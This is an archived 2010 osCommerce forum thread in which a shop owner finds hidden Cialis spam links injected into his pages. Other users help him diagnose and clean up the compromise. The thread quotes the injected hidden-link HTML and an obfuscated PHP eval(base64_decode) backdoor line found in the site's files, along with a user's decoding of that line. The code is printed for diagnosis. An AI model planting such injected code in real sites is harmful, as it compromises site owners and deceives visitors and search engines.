dusty108 Posted April 24, 2010 Share Posted April 24, 2010 v2.2RC2 Google keywords has alerted me to the presence of the word "Cialis" on two of my web pages. When I checked the pages viewing the source this is what I found tagged on at the bottom of the page: First Page: http://www.landnsea.co.uk/sailing-c-21.html <br> <script>document.write("<p sty"+"le=displ"+"ay:no"+"ne>");</script> <a href="http://www.premierinternet.com">generic cialis online</a> <a href="http://www.jan-oidium.com">generic cialis</a> <a href="http://www.cbn.co.za">generic viagra online</a> <a href="http://www.cantors.org">cheap cialis</a> <a href="http://www.technosci.com">cialis online</a> <a href="http://www.lolitadress.net">generic cialis online</a> <a href="http://www.mendocino-chocolate.com">cheap generic cialis</a> <a href="http://www.apoprecords.com">cialis no prescription</a> <a href="http://www.cardinalcorner.com">order cialis online</a> <a href="http://vehicleemergencylighting.com">online pharmacy cialis</a> <a href="http://www.tantrastoreonline.com">cialis price</a> <a href="http://www.polhn.org">order cheap drugs online</a> </p> </body> </html> Second Page: http://www.landnsea.co.uk/penn-m-14.html <!-- footer_eof //--> <br> <script>document.write("<p sty"+"le=displ"+"ay:no"+"ne>");</script> <a href="http://www.premierinternet.com">generic cialis online</a> <a href="http://www.jan-oidium.com">generic cialis</a> <a href="http://www.cbn.co.za">generic viagra online</a> <a href="http://www.cantors.org">cheap cialis</a> <a href="http://www.technosci.com">cialis online</a> <a href="http://www.lolitadress.net">generic cialis online</a> <a href="http://www.mendocino-chocolate.com">cheap generic cialis</a> <a href="http://www.apoprecords.com">cialis no prescription</a> <a href="http://www.cardinalcorner.com">order cialis online</a> <a href="http://vehicleemergencylighting.com">online pharmacy cialis</a> <a href="http://www.tantrastoreonline.com">cialis price</a> <a href="http://www.polhn.org">order cheap drugs online</a> </p> </body> </html> How do I go about cleaning this up? Can I just go back to a safe back up date? File permissions are all set at 755/644. Link to comment Share on other sites More sharing options...
burt Posted April 24, 2010 Share Posted April 24, 2010 You need to find out HOW the hack happened, then plug the hole. Reverting to a backup is no good. You need to rename and password protect your Admin area NOW. I have messaged you somethin interesting. Link to comment Share on other sites More sharing options...
dusty108 Posted April 24, 2010 Author Share Posted April 24, 2010 You need to find out HOW the hack happened, then plug the hole. Reverting to a backup is no good. You need to rename and password protect your Admin area NOW. I have messaged you somethin interesting. Thanks Burt. That was rather surprising. Can you help with renaming admin ? I tried changing admin name but when I log in I have problems going through the different menus as they keeping looking for admin. Link to comment Share on other sites More sharing options...
burt Posted April 24, 2010 Share Posted April 24, 2010 Log in FTP, rename the /admin/ folder to something completely random which would be hard to guess for anyone except you. Eg; /admin_qqq0wo38cnS/ Then download the file at *your new admin name*/includes/configure.php In that file, you'll find two or three instances of "admin" , change that to the same as your newly renamed admin area. Upload it. Then use cPanel (or whatver host control panel you have) to password protect the admin using htaccess/htpasswd Link to comment Share on other sites More sharing options...
burt Posted April 24, 2010 Share Posted April 24, 2010 Oh and now find the security thread (it's a long one) and do all the security changes and sanitise your site of any existing bad code. Link to comment Share on other sites More sharing options...
dusty108 Posted April 24, 2010 Author Share Posted April 24, 2010 Oh and now find the security thread (it's a long one) and do all the security changes and sanitise your site of any existing bad code. I have found the following code has been inserted in a random selection of files on my site: Do you think it could be the culprit? <?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy92YXIvd3d3L3Zob3N0cy9sYW5kbnNlYS5jby51ay9odHRwZG9jcy9sYW5kbnNlYS9hZG1pbi9pbmNsdWRlcy9sYW5ndWFnZXMvZW5nbGlzaC9tb2R1bGVzL2luZGV4L3N0eWxlLmNzcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0=')); ?> Link to comment Share on other sites More sharing options...
germ Posted April 24, 2010 Share Posted April 24, 2010 Decodes to: if(function_exists('ob_start')&&!isset($GLOBALS['mfsn'])){ $GLOBALS['mfsn'] = '/var/www/vhosts/YOUR_DOMAIN.co.uk/httpdocs/YOUR_DOMAIN/admin/includes/languages/english/modules/index/style.css.php'; if(file_exists($GLOBALS['mfsn'])){ include_once($GLOBALS['mfsn']); if(function_exists('gml')&&function_exists('dgobh')){ ob_start('dgobh'); } } } It's hack code. Also tells where to find one of their files. /admin/includes/languages/english/modules/index/style.css.php If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there > Link to comment Share on other sites More sharing options...
dusty108 Posted April 24, 2010 Author Share Posted April 24, 2010 Thanks for decoding that for me. When I followed the path admin/includes/languages/english/modules/index/ The only files were customers.php and orders.php. No style.css.php. Strange? Link to comment Share on other sites More sharing options...
germ Posted April 24, 2010 Share Posted April 24, 2010 I didn't make the soup, Doc, I can only tell you what's in it... :blush: The early versions of this hack showed their trash to anyone that viewed the page. Now they have it programmed that it shows only when search engines index the site (keying off IP addresses). You don't even know you're hacked unless you look at your cache in google or see the code in your files. :'( If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there > Link to comment Share on other sites More sharing options...
dusty108 Posted April 24, 2010 Author Share Posted April 24, 2010 My host has scanned my site and removed the infection their scanners picked up. The problem no longer shows on the two files I quoted earlier. I'm going to have to sort out my admin file and see what else I can do to secure my site. Thanks for your help. Link to comment Share on other sites More sharing options...
germ Posted April 24, 2010 Share Posted April 24, 2010 My host has scanned my site and removed the infection their scanners picked up. The problem no longer shows on the two files I quoted earlier. I'm going to have to sort out my admin file and see what else I can do to secure my site. Thanks for your help. There is a thread in this area on "How to Secure Your SIte". Read that. Part of it is removing the file_manager.php and define_language.php in your admin. I went to your site and the admin isn't protected by .htaccess. That being said, they can get into the site via a vulnerability in the aforementioned files. :o If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there > Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.